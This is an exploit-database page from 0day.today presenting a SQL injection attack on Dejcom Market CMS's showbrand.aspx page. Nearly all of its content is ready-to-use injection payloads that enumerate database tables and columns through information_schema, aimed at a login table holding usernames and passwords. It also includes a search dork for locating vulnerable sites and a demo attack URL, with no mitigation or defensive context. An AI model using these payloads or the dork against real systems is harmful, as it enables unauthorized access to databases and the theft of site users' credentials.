[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dejcom Market CMS (showbrand.aspx) SQL Injection Vulnerability

Author
Mormoroth
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15044
Category
web applications
Date add
05-12-2010
Platform
asp
==============================================================
Dejcom Market CMS (showbrand.aspx) SQL Injection Vulnerability
==============================================================

# Exploit Title: [Dejcom Market Cms SQL injection]
# Date: [01/12/2010]
# Author: [Mormoroth]
# Dork : "Powered By Dejcom Market CMS"
# Version: [ALL Version]
 Exploit:
 
 %27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge','COMMENTS','filegroup','files','groups','khabarname','khat','links','login'))--
 
showbrand.aspx?bc=%27 or 1=(select top 1 column_name from information_schema.columns where table_name='loguser' and column_name not in('code','username','pass'))--
 
Demo : http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--
---------------------
Persian Gulf forever
ISCN TEAM
We are Mormoroth - Magicboy



#  0day.today [2024-11-15]  #